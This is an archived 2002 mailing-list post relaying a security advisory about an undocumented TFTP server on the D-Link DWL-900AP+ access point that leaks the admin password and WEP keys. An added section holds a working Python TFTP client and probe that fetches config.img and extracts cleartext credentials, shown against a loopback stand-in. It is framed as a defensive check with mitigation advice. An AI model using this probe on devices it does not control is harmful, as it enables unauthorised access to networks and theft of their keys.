CRIME Yet another way to hack wireless...

From: brvarin@private
Date: Fri Oct 25 2002 - 00:39:42 PDT


    Ok, so you've locked down your access point with WEP, etc... Now come the
    undocumented "features" of APs. Another reason to put
    authentication/authorization/encryption on something other than the access
    point.
    
    If you own one of the newer 22Mbps APs, such as
    
    - D-Link DWL-900AP+(Confirmed)
    - ALLOY GL-2422AP-S
    - EUSSO GL2422-AP
    - LINKSYS WAP11-V2.2
    - WISECOM GL2422AP-0T
    
    ----------------------------------------------------------------------
    ETHEREANET-NCC Security Report EN-NCC-20021014-04
    D-Link Access Point DWL-900AP+ TFTP Vulnerability
    
    Date discovered: Fri, 11 Oct 2002
    Vendor notified on: Mon, 14 Oct 2002
    Date published: Mon, 21 Oct 2002
    
    Vendor Reference: D-Link US Support Case-ID DL204488
    ----------------------------------------------------------------------
    
    
    Overview
    --------
    While evaluating the D-Link DWL-900AP+ Access Point/Bridge, we discovered a
    severe vulnerability that could be exploited by a potential intruder to
    gain full administrative access to the device.
    
    
    Description
    -----------
    D-Link's DWL-900AP+ is a WiFi/802.11b Access Point with enhanced 22Mbps
    transfer mode (aka "802.11b+") and proprietary bridging functions,
    typically targeted at SOHO installations. The device can be connected to an
    existing wired network by means of a standard 10/100 ethernet port and can
    be configured by using a javascript-enabled HTTP client (WEB browser)
    pointed at its IP address.
    
    Although undocumented, the device also features an embedded TFTP (Trivial
    File Transfer Protocol) server which can be used to obtain critical data:
    by requesting a file named "config.img", an intruder receives a binary image
    of the device configuration which contains, among others, the following
    information:
    
    - the "admin" password required by the HTTP user interface
    - the WEP encryption keys
    - the network configuration data (addresses, SSID, etc.)
    
    Such data are returned in cleartext and may be accessed by any
    wired/wireless client. Note that if the device is configured to use a
    "public" IP address and a valid "gateway" (connected to the Internet) is
    specified in the wired LAN configuration screen, the TFTP service (hence
    the critical data) could be accessed world-wide.
    
    
    Additional info
    ---------------
    In addition to the above mentioned "config.img", the following undocumented
    files are also accessible via the TFTP protocol:
    
    - eeprom.dat
    - mac.dat
    - wtune.dat
    - rom.img
    - normal.img
    
    the last one being the (compressed) firmware image as uploaded to the
    device. We did not investigate further, so the above list is to be regarded
    as NOT exhaustive.
    
    
    Tested devices
    --------------
    Model No: DWL-900AP+ (FCC-ID: KA2DWL900AP-PLUS)
    H/W: B1
    F/W: 2.1 & 2.2
    
    The vulnerability has been observed with both 2.1 & 2.2 firmware revisions.
    
    
    Solutions
    ---------
    There are NO known solutions or workarounds at the moment. A firmware
    upgrade is urged from the vendor. A complete report of the vulnerability
    was sent to D-Link's International Support <techs@private> on Mon,
    14 Oct 2002 and was assigned the case-id: DL204488.
    
    
    Discovered by
    -------------
    Rocco Rionero, <rock@private>
    
    
    Note about potentially affected re-branded devices (NOT VERIFIED)
    -----------------------------------------------------------------
    The DWL-900AP+ appears to be based on a device originally developed by
    "Global Sun Technology Inc.": as the same device is also sold with other
    brands, the vulnerability MAY apply to any of them. Potentially affected
    devices include the following access points:
    
    - ALLOY GL-2422AP-S
    - EUSSO GL2422-AP
    - LINKSYS WAP11-V2.2
    - WISECOM GL2422AP-0T
    
    Please, note: NONE of the above was tested.
    
    
    Disclaimer
    ----------
    All information in this report is subject to change without advance
    notice or mutual consent; the report itself is released as is.
    Neither the author, nor the parties (if any) involved in the distribution of
    this report, are responsible for any risk or occurrence caused by applying
    the information included.
    
    
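The check a practitioner would want after reading the advisory above is a way to ask a device, over the wire, whether it hands out "config.img" and the other listed files to an unauthenticated TFTP read request, and to see how cleartext credentials surface in the returned blob. The following is an added example, not code from the original post or from the advisory's author: a minimal RFC 1350 TFTP read client (RRQ, then lock-step DATA/ACK, with the transfer moving to the server's new port as the protocol requires), a probe over the six file names the advisory lists, and a `strings`-style scan of the result. To keep it runnable offline, a tiny loopback TFTP server stands in for the access point and serves a constructed blob whose layout is invented for the example; the real config.img format is not known from the advisory. Against a real device you would call `tftp_get(ap_ip, 69, "config.img")` instead.

```python
import socket
import struct
import threading

# RFC 1350 opcodes and block size
TFTP_RRQ, TFTP_DATA, TFTP_ACK, TFTP_ERROR = 1, 3, 4, 5
BLOCK = 512

# File names the advisory reports as readable without authentication.
UNDOCUMENTED_FILES = ["config.img", "eeprom.dat", "mac.dat", "wtune.dat", "rom.img", "normal.img"]

# CONSTRUCTED stand-in for config.img (the real layout is not documented): a
# few cleartext fields between filler bytes, padded to exactly two blocks so
# the transfer also exercises the empty terminating DATA packet.
FAKE_CONFIG_IMG = (
    b"\x00" * 16
    + b"admin\x00" + b"s3cretpass\x00"        # HTTP UI login and password
    + b"\xff" * 8
    + b"SSID=labnet\x00"
    + b"WEP1=0123456789abc\x00"               # 13-byte (104-bit) WEP key
    + b"IP=192.168.0.50\x00"
).ljust(1024, b"\x00")


def build_rrq(filename, mode="octet"):
    """Encode a TFTP read request: opcode 1, filename, NUL, mode, NUL."""
    return struct.pack("!H", TFTP_RRQ) + filename.encode() + b"\0" + mode.encode() + b"\0"


def tftp_get(host, port, filename, timeout=2.0):
    """Fetch one file; return its bytes, or None on ERROR reply or silence."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    sock.sendto(build_rrq(filename), (host, port))
    data, expected, tid = bytearray(), 1, None
    try:
        while True:
            pkt, addr = sock.recvfrom(4 + BLOCK)
            if tid is None:
                tid = addr                    # server answers from a fresh port (its TID)
            elif addr != tid:
                continue                      # ignore datagrams from anyone else
            op = struct.unpack("!H", pkt[:2])[0]
            if op == TFTP_ERROR:
                return None
            if op != TFTP_DATA:
                continue
            block = struct.unpack("!H", pkt[2:4])[0]
            sock.sendto(struct.pack("!HH", TFTP_ACK, block), tid)   # ACK (re-ACK duplicates too)
            if block == expected:
                data += pkt[4:]
                expected += 1
                if len(pkt) - 4 < BLOCK:      # short block ends the transfer
                    return bytes(data)
    except socket.timeout:
        return None
    finally:
        sock.close()


def probe(host, port=69, names=UNDOCUMENTED_FILES):
    """Return {filename: size} for every file the device hands out unauthenticated."""
    found = {}
    for name in names:
        blob = tftp_get(host, port, name)
        if blob is not None:
            found[name] = len(blob)
    return found


def ascii_strings(blob, min_len=4):
    """Printable runs of at least min_len bytes, the way `strings` would list them."""
    out, cur = [], bytearray()
    for b in blob + b"\x00":                  # trailing NUL flushes the last run
        if 32 <= b < 127:
            cur.append(b)
        else:
            if len(cur) >= min_len:
                out.append(cur.decode())
            cur = bytearray()
    return out


def _serve(files, lsock, stop):
    """Loopback TFTP server (read-only, one client at a time) used in place of the AP."""
    while not stop.is_set():
        try:
            pkt, client = lsock.recvfrom(1024)
        except socket.timeout:
            continue
        if struct.unpack("!H", pkt[:2])[0] != TFTP_RRQ:
            continue
        name = pkt[2:].split(b"\0")[0].decode(errors="replace")
        if name not in files:
            lsock.sendto(struct.pack("!HH", TFTP_ERROR, 1) + b"File not found\0", client)
            continue
        tsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)   # new TID for the transfer
        tsock.settimeout(1.0)
        body = files[name]
        for n, off in enumerate(range(0, len(body) + 1, BLOCK), start=1):   # +1: exact multiple => empty last block
            tsock.sendto(struct.pack("!HH", TFTP_DATA, n) + body[off:off + BLOCK], client)
            try:
                tsock.recvfrom(4)             # wait for the ACK (no retransmit in this toy server)
            except socket.timeout:
                break
        tsock.close()
    lsock.close()


def start_loopback_server(files):
    """Bind an ephemeral UDP port on 127.0.0.1 and serve `files`; return (port, stop_event)."""
    lsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    lsock.bind(("127.0.0.1", 0))
    lsock.settimeout(0.2)
    stop = threading.Event()
    threading.Thread(target=_serve, args=(files, lsock, stop), daemon=True).start()
    return lsock.getsockname()[1], stop


def demo():
    """Probe the loopback 'AP' and list the cleartext fields found in config.img."""
    port, stop = start_loopback_server({"config.img": FAKE_CONFIG_IMG, "mac.dat": b"\x00\x11\x22\x33\x44\x55"})
    try:
        found = probe("127.0.0.1", port)
        return found, ascii_strings(tftp_get("127.0.0.1", port, "config.img"))
    finally:
        stop.set()


if __name__ == "__main__":
    found, fields = demo()
    print("unauthenticated files:", found)
    print("cleartext fields in config.img:", fields)
```

Two things are worth noting for use against a real device. A positive result from `probe` is the point at which you know the admin password and WEP keys are exposed to anyone who can reach UDP/69 on the AP's address, which, as the advisory says, may include the Internet if the device has a public address and a gateway; the immediate mitigation is to filter UDP/69 to the AP at a router or firewall upstream of it, since there is no setting on the device itself. And a silent `None` from `tftp_get` means only that nothing answered within the timeout, so a device behind a filter and a device without the TFTP server look the same from the probe's point of view.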



    This archive was generated by hypermail 2b30 : Fri Oct 25 2002 - 01:54:28 PDT